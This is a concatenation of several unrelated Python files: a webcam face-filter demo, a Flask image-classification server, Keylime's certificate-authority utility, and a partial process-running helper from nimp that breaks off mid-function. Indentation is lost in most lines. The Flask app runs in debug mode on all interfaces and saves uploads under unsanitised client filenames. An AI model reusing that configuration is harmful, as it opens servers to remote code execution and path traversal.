frame[y_offset:y_offset + h, x_offset:x_offset + w, ch] = sprite_pixel * sprite_alpha + img_pixel * img_alpha
return frame
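# Alpha-compositing sketch: draw_sprite() above blends a 4-channel (BGRA)
# sprite over the frame with out = sprite * alpha + frame * (1 - alpha),
# applied per colour channel. This self-contained example reproduces the same
# formula on synthetic arrays; it is illustrative and not used by the demo.
def _example_alpha_blend():
    import numpy as np
    frame = np.zeros((4, 4, 3), dtype=np.float32)          # black background
    sprite = np.full((4, 4, 4), 255.0, dtype=np.float32)   # white, fully opaque BGRA
    alpha = sprite[:, :, 3] / 255.0
    for ch in range(3):
        frame[:, :, ch] = sprite[:, :, ch] * alpha + frame[:, :, ch] * (1.0 - alpha)
    return frame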
def adjust_sprite2head(sprite, head_width, head_ypos, ontop=True):
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0 * head_width / w_sprite
# adjust to have the same width as head
sprite = cv2.resize(sprite, (0, 0), fx=factor, fy=factor)
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
# adjust the position of sprite to end where the head begins
y_orig = (head_ypos - h_sprite) if ontop else head_ypos
    if y_orig < 0:  # the head is too close to the top of the image, so the sprite would not fit on screen
sprite = sprite[abs(y_orig)::, :, :] # in that case, we cut the sprite
y_orig = 0 # the sprite then begins at the top of the image
return (sprite, y_orig)
def apply_sprite(image, path2sprite, w, x, y, angle, ontop=True):
sprite = cv2.imread(path2sprite, -1)
sprite = rotate_bound(sprite, angle)
(sprite, y_final) = adjust_sprite2head(sprite, w, y, ontop)
image = draw_sprite(image, sprite, x, y_final)
def calc_slope(point1, point2):
x1, x2, y1, y2 = point1[0], point2[0], point1[1], point2[1]
incl_rad = math.atan((float(y2 - y1)) / (x2 - x1))
incl_deg = 180 / math.pi * incl_rad
return incl_deg
def calculate_boundbox(coords):
x = min(coords[:, 0])
y = min(coords[:, 1])
w = max(coords[:, 0]) - x
h = max(coords[:, 1]) - y
return (x, y, w, h)
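# get_face_boundbox() below slices into dlib's 68-point facial landmark layout
# (roughly: 17-26 eyebrows, 29-35 nose, 36-47 eyes, 48-67 mouth); the exact
# ranges are the ones hard-coded in the function body.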
def get_face_boundbox(points, face_part):
input_points = None
if face_part == LEFT_EYEBROW:
input_points = points[17:22]
elif face_part == RIGHT_EYEBROW:
input_points = points[22:27]
elif face_part == LEFT_EYE:
input_points = points[36:42]
elif face_part == RIGHT_EYE:
input_points = points[42:48]
elif face_part == NOSE:
input_points = points[29:36]
elif face_part == MOUTH:
input_points = points[48:68]
else:
raise NotImplementedError(f'Invalid face part requested for bounding box! ID: {face_part}')
(x, y, w, h) = calculate_boundbox(input_points)
return (x, y, w, h)
def cvloop(run_event):
global main_panel
global SPRITES
# for flies animation
dir_ = "./sprites/flies/"
flies = [f for f in listdir(dir_) if isfile(join(dir_, f))]
i = 0
video_capture = cv2.VideoCapture(0)
# acquire dlib's face detector
face_detector = dlib.get_frontal_face_detector()
# load facial landmarks model
print("[INFO] loading facial landmark predictor...")
model = "filters/shape_predictor_68_face_landmarks.dat"
# link to model: http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
predictor = dlib.shape_predictor(model)
while run_event.is_set(): # while the thread is active we loop
ret, image = video_capture.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = face_detector(gray, 0)
for face in faces: # if there are faces
(x, y, w, h) = (face.left(), face.top(), face.width(), face.height())
# find facial landmarks
shape = predictor(gray, face)
shape = face_utils.shape_to_np(shape)
# get face tilt inclination based on eyebrows
incl = calc_slope(shape[17], shape[26])
# check if mouth is open for doggy filter
            # y coordinates of the lip landmark points
is_mouth_open = (shape[66][1] - shape[62][1]) >= 10
# add a hat
if SPRITES[0]:
apply_sprite(image, "./sprites/hat.png", w, x, y, incl)
# add a mustache
if SPRITES[1]:
(x1, y1, w1, h1) = get_face_boundbox(shape, 6)
apply_sprite(image, "./sprites/mustache.png", w1, x1, y1, incl)
# add some animated flies
if SPRITES[2]:
apply_sprite(image, dir_ + flies[i], w, x, y, incl)
# when done with all images of that folder, begin again
i = (i + 1) % len(flies)
# add some glasses
if SPRITES[3]:
(x3, y3, _, h3) = get_face_boundbox(shape, 1)
apply_sprite(image, "./sprites/glasses.png", w, x, y3, incl, ontop=False)
# add some doggy things
(x0, y0, w0, h0) = get_face_boundbox(shape, 6) # bound box of mouth
if SPRITES[4]:
(x3, y3, w3, h3) = get_face_boundbox(shape, 5) # nose
apply_sprite(image, "./sprites/doggy_nose.png", w3, x3, y3, incl, ontop=False)
apply_sprite(image, "./sprites/doggy_ears.png", w, x, y, incl)
if is_mouth_open:
apply_sprite(image, "./sprites/doggy_tongue.png", w0, x0, y0, incl, ontop=False)
if SPRITES[5]:
if is_mouth_open:
apply_sprite(image, "./sprites/rainbow.png", w0, x0, y0, incl, ontop=False)
if SPRITES[6]:
(left_x5, left_y5, left_w5, left_h5) = get_face_boundbox(shape, 3)
(right_x5, right_y5, right_w5, right_h5) = get_face_boundbox(shape, 4)
apply_sprite(image, "./sprites/eye.png", w // 6, left_x5, left_y5, incl, ontop=False)
apply_sprite(image, "./sprites/eye.png", w // 6, right_x5, right_y5, incl, ontop=False)
# OpenCV == BGR; PIL == RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
main_panel.configure(image=image)
main_panel.image = image
video_capture.release()
# Initialize GUI object
root = Tk()
root.title("Not really Snapchat")
BTNS = []
for (id, name) in enumerate(ALL_SPRITES):
def do_toggle_sprite(id):
return lambda: toggle_sprite(id)
btn = Button(root, text=name, command=do_toggle_sprite(id))
btn.pack(side="top", fill="both", expand="no", padx="5", pady="5")
BTNS.append(btn)
main_panel = Label(root)
main_panel.pack(padx=10, pady=10)
SPRITES = [False] * len(BTNS)
# Creates a thread for openCV processing
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.daemon = True
action.start()
# Function to clean everything up
def terminate():
global root, run_event, action
print("Cleaning up OpenCV resources...")
run_event.clear()
time.sleep(1)
# action.join() #strangely in Linux this thread does not terminate properly, so .join never finishes
root.destroy()
print("All closed!")
# When the GUI is closed, it activates the terminate function
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() # creates loop of GUI
|
app.py
|
import cv2, json, os
import requests
import numpy as np
import configparser
from threading import Thread
import tensorflow as tf
from flask import Flask, jsonify, request, render_template, redirect, url_for, send_from_directory, abort
from keras.layers import Input
from keras.models import Sequential, Model, load_model
from keras.layers.core import Flatten
from keras.layers import GlobalAveragePooling2D
from keras.applications.xception import Xception
from keras.applications.mobilenet import MobileNet
from keras.applications.resnet50 import ResNet50
from sklearn.externals import joblib
app = Flask(__name__)
UPLOAD_FOLDER = './upload'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
graph1 = None
model1 = None
reducer1 = None
reducer2 = None
reducer3 = None
reducer4 = None
classifier = None
label_dict = {}
con_l_dict = {}
URL = 'http://127.0.0.1:5001'
app.config['MOBILENET_URL'] = URL
def classify_process():
global model1, graph1
global reducer1, reducer2, reducer3, reducer4, classifier
tmp_dict = {row.strip().split(',')[1]: 0 for row in open('./models/label.csv', 'r')}
print(tmp_dict)
count = 0
for key in tmp_dict.keys():
label_dict[str(count)] = key
count += 1
graph1 = tf.get_default_graph()
with graph1.as_default():
shape = (224, 224, 3)
input_tensor = Input(shape=shape)
base_model = ResNet50(weights='imagenet', include_top=False, input_tensor=input_tensor)
added_layer = GlobalAveragePooling2D()(base_model.output)
model1 = Model(inputs=base_model.input, outputs=added_layer)
reducer1 = joblib.load('./models/c_umap_model.sav')
reducer2 = joblib.load('./models/r_umap_model.sav')
reducer3 = joblib.load('./models/g_umap_model.sav')
reducer4 = joblib.load('./models/b_umap_model.sav')
classifier = joblib.load('./models/randumforest_model.sav')
@app.route('/', methods = ["GET", "POST"])
def root():
if request.method == 'GET':
return render_template('index.html')
elif request.method == "POST":
f = request.files['FILE']
f_path = save_img(f)
files = {'FILE': (f.filename, open(f_path, 'rb'))}
response = requests.post(app.config['MOBILENET_URL']+'/predict', files=files)
pred1 = json.loads(response.content)['data']
print('Rigel')
print(pred1)
pred2 = predict_core([f_path]).data.decode('utf-8')
pred2 = json.loads(pred2)['data']
        print('Betelgeuse')
print(pred2)
result = make_result(pred1, pred2, [f_path])
path = os.path.join(app.config['UPLOAD_FOLDER'], f.filename)
return render_template(
'index.html',
filepath=path,
predict=result[0]
)
@app.route('/upload/<filename>')
def get_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
def make_result(x1, x2, path_list):
pred = (np.array(x1) + np.array(x2)) / 2
names = [item.split('/')[-1] for item in path_list]
result = []
for idx in range(len(pred)):
order = pred[idx].argsort()
cl1 = order[-1]
cl2 = order[-2]
item = {
'name': names[idx],
'class1': (label_dict[str(cl1)], str(pred[idx][cl1])),
'class2': (label_dict[str(cl2)], str(pred[idx][cl2])),
}
result.append(item)
print(result)
return result
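# Ensemble sketch: make_result() above averages two per-class probability
# vectors and reports the two highest-scoring labels per image. This hedged,
# self-contained illustration uses made-up labels, predictions and a
# placeholder file path; it is not called by the app.
def _example_make_result():
    label_dict.update({'0': 'cat', '1': 'dog', '2': 'bird'})
    pred_a = [[0.2, 0.7, 0.1]]   # e.g. response of the remote MobileNet service
    pred_b = [[0.1, 0.8, 0.1]]   # e.g. output of predict_core()
    return make_result(pred_a, pred_b, ['upload/example.jpg'])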
def save_img(f):
stream = f.stream
img_array = np.asarray(bytearray(stream.read()), dtype=np.uint8)
img = cv2.imdecode(img_array, 1)
f_path = UPLOAD_FOLDER+'/'+f.filename
cv2.imwrite(f_path, img)
return f_path
def predict_core(path_list):
global model1, graph1
    global reducer1, reducer2, reducer3, reducer4, classifier
data = preprocess(path_list)
names = [item.split('/')[-1] for item in path_list]
r_hists, g_hists, b_hists = [], [], []
for f_path in path_list:
print(f_path)
img = cv2.imread(f_path)
img = cv2.resize(img, (224, 224))
r_hist = cv2.calcHist([img], [0], None, [256], [0,256])
g_hist = cv2.calcHist([img], [1], None, [256], [0,256])
b_hist = cv2.calcHist([img], [2], None, [256], [0,256])
r_hists.append([item[0] for item in r_hist])
g_hists.append([item[0] for item in g_hist])
b_hists.append([item[0] for item in b_hist])
with graph1.as_default():
features = model1.predict(data)
features = reducer1.transform(features)
r_hists = reducer2.transform(r_hists)
g_hists = reducer3.transform(g_hists)
b_hists = reducer4.transform(b_hists)
reduced_features = np.concatenate([features, r_hists, g_hists, b_hists], 1)
pred = classifier.predict_proba(reduced_features)
# print(pred)
return jsonify({
'status': 'OK',
'data': pred.tolist()
})
def preprocess(f_list):
datas = []
for f_path in f_list:
print(f_path)
img = cv2.imread(f_path)
img = cv2.resize(img, (224, 224))
img = img.astype(np.float32) / 255.0
datas.append(img)
datas = np.asarray(datas)
return datas
def abortWithInvalidParams(reason, debug={}):
abort(400, {
'errorCode': 1,
'description': 'invalid params',
'reason': reason,
'debug': debug,
})
def abortWithNoItem(reason, debug={}):
abort(404, {
'errorCode': 2,
'description': 'no item',
'reason': reason,
'debug': debug,
})
def abortWithServerError(reason, debug={}):
abort(500, {
'errorCode': 3,
'description': 'server error',
'reason': reason,
'debug': debug,
})
if __name__ == "__main__":
t = Thread(target=classify_process, args=())
t.daemon = True
t.start()
print(" * Flask starting server...")
app.run(host='0.0.0.0', port=80, debug=True)
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage:
# Create a temporary CA cert and its private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open('%s-cert.crt' % name, 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open("%s-private.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open("%s-public.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path('%s-cert.crt' % name)
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info(f"Created certificate for name {name} successfully in {workingdir}")
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info(f"CA certificate created successfully in {workingdir}")
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip' % name, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip" %
(name, name))
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info(f"No CRL distribution points in {cert_path}")
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s" %
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d" %
(socket.getfqdn(), config.CRL_PORT))
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in1hour:
logger.info(
"Certificate to expire soon %s, re-issuing" % expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
        t2.daemon = True
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s" % revocation)
return
logger.info("Revoking certificate: %s" % serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet." %
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
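# Keystore round-trip sketch: write_private()/read_private() above persist the
# CA state as YAML encrypted with a key derived from the global password. This
# hedged example shows the round trip inside a scratch directory; the password
# and directory are placeholders and no real CA working directory is touched.
def _example_keystore_roundtrip(scratch_dir):
    cwd = os.getcwd()
    try:
        os.chdir(scratch_dir)
        setpassword("example-password")
        priv, salt = read_private()       # invents a salt when no keystore exists
        priv['lastserial'] = 1
        write_private((priv, salt))       # writes an encrypted private.yml (0600)
        return read_private()             # decrypts it again
    finally:
        os.chdir(cwd)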
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s" % config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s"
% args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s" % args.command)
parser.print_help()
sys.exit(-1)
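# End-to-end sketch: the command handlers above compose naturally; cmd_init()
# creates the CA, cmd_mkcert() issues a signed certificate and cmd_certpkg()
# zips the result. This hedged, programmatic example uses a scratch working
# directory; the password and common name are placeholders.
def _example_issue_cert(workingdir):
    setpassword("example-password")
    cmd_init(workingdir)
    cmd_mkcert(workingdir, "server.example.com")
    pkg, serial, subject = cmd_certpkg(workingdir, "server.example.com")
    return serial, subject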
|
process.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2019 Dontnod Entertainment
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
''' Process-related system utilities '''
import ctypes
import logging
import locale
import os
import os.path
import struct
import subprocess
import threading
import time
import nimp.sys.platform
def call(command, cwd='.', heartbeat=0, stdin=None, encoding='utf-8',
capture_output=False, capture_debug=False, hide_output=False, dry_run=False):
''' Calls a process redirecting its output to nimp's output '''
command = _sanitize_command(command)
if not hide_output:
logging.info('Running "%s" in "%s"', ' '.join(command), os.path.abspath(cwd))
if dry_run:
return 0
if capture_debug and not hide_output and nimp.sys.platform.is_windows():
_disable_win32_dialogs()
debug_pipe = _OutputDebugStringLogger()
else:
debug_pipe = None
    # The bufsize = -1 is important; if we don’t buffer the output, we’re
# going to make the callee lag a lot. In Python 3.3.1 this is now the
# default behaviour, but it used to default to 0.
try:
process = subprocess.Popen(command,
cwd = cwd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
stdin = subprocess.PIPE if stdin is not None else subprocess.DEVNULL,
bufsize = -1)
except FileNotFoundError as ex:
logging.error(ex)
return 1
if debug_pipe:
debug_pipe.attach(process.pid)
debug_pipe.start()
# FIXME: put all this in a class instead!
all_pipes = [ process.stdout,
process.stderr,
debug_pipe.output if debug_pipe else None ]
all_captures = [ [] if capture_output else None,
[] if capture_output else None,
None ]
debug_info = [ False ]
def _heartbeat_worker(heartbeat):
last_time = time.monotonic()
while process is not None:
if heartbeat > 0 and time.monotonic() > last_time + heartbeat:
logging.info("Keepalive for %s", command[0])
last_time += heartbeat
time.sleep(0.050)
def _input_worker(in_pipe, data):
in_pipe.write(data)
in_pipe.close()
def _output_worker(index):
in_pipe = all_pipes[index]
capture_array = all_captures[index]
if in_pipe is None:
return
force_ascii = locale.getpreferredencoding().lower() != 'utf-8'
while process is not None:
logger = logging.getLogger('child_processes')
# Try to decode as UTF-8 with BOM first; if it fails, try CP850 on
# Windows, or UTF-8 with BOM and error substitution elsewhere. If
# it fails again, try CP850 with error substitution.
encodings = [('ascii', 'backslashreplace') if force_ascii else ('utf-8-sig', 'strict'),
('cp850', 'strict') if nimp.sys.platform.is_windows() else ('utf-8-sig', 'replace'),
('cp850', 'replace')]
for data in iter(in_pipe.readline, b''):
for encoding, errors in encodings:
try:
line = data.decode(encoding, errors=errors)
break
except UnicodeError:
pass
if capture_array is not None:
capture_array.append(line)
# Stop reading data from stdout if data has arrived on OutputDebugString
if index == 2:
debug_info[0] = True
elif index == 0 and debug_info[0]:
